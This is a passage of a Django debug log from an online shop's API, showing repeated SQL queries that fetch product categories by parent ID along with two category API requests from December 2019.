ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:41:37,146 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:41:37,148 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:41:37,150 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:41:37,154 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:41:37,156 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:41:37,158 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:41:37,160 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:41:37,163 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:41:37,166 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:41:37,168 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:41:37,171 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:41:37,173 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:41:37,175 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:41:37,178 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:41:37,181 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:41:37,183 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:41:37,185 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:41:37,188 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:41:37,190 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:41:37,193 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:41:37,195 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:41:37,197 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:41:37,199 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:41:37,202 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:41:37,205 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:41:37,207 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:41:37,209 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:41:37,212 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:41:37,214 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:41:37,216 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:41:37,219 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:41:37,221 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:41:37,223 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:41:37,226 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:41:37,228 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:41:37] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:42:04,558 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-16 07:42:04,564 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) [16/Dec/2019 07:42:04] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-16 07:42:04,599 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:42:04,606 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:42:04,610 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:42:04,613 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:42:04,616 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:42:04,618 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:42:04,621 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:42:04,623 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:42:04,625 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:42:04,629 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:42:04,632 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:42:04,634 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:42:04,637 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:42:04,640 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:42:04,645 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:42:04,648 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:42:04,651 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:42:04,654 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:42:04,657 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:42:04,662 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:42:04,665 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:42:04,668 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:42:04,671 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:42:04,674 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:42:04,677 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:42:04,682 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:42:04,685 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:42:04,688 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:42:04,691 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:42:04,694 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:42:04,698 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", 